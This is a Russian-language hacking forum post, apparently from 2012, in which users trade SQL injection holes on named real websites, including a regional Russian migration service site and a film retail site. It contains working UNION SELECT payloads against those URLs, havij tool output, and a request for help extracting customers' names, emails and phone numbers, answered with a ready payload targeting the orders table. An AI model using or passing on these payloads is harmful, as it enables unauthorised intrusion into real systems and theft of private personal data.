02.08.2012, 14:48
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами:
7854806
Репутация:
173
|
|
lex1094
Сообщение от lex1094
Нашёл SQL Injections на сайте УФМС России по Приморскому краю, но разрабатывать её не стал.
Вот сама SQL: http://fmspk.ru/news.php?id=222'
Нормально нужно выкладывать, а не это
Сообщение от None
http://fmspk.ru/news.php?id=222+union+select+1,2,3,table_name,5+fr om+information_schema.tables
Сообщение от lexus5122
Нашел уязвимость через havij: http://www.kinovdom.ru/item.php?id=18537
bd: u0021_kinovdom
таблица: orders
колонки: name
email
phone
Проблема в том, что в этой огромной бд, достается этим havij 99% всех данных, но конкретно данная таблица, не достается, пишет следующее:
Count(*) of u0021_kinovdom.orders is 0
Can not get rows count, trying to get 10 rows
Turning off 'bypass illegal union' and retrying!
Data Found: name=
Turning on 'bypass illegal union' and retrying!
Data Found: email=
Turning off 'bypass illegal union' and retrying!
Data Found: phone=
Turning on 'bypass illegal union' and retrying!
и так далее... Помогите пожалуйста достать эти данные!
Правильно пишет, потому что там пусто
Сообщение от None
http://www.kinovdom.ru/item.php?id=-18537+union+select+1,2,3,concat_ws%280x3a,name,ema il,phone%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21+from+orders--
И главное, для подобных вопросов, тут есть отдельная тема, там и спрашивайте
Сообщение от None
/thread46016.html
|
|
|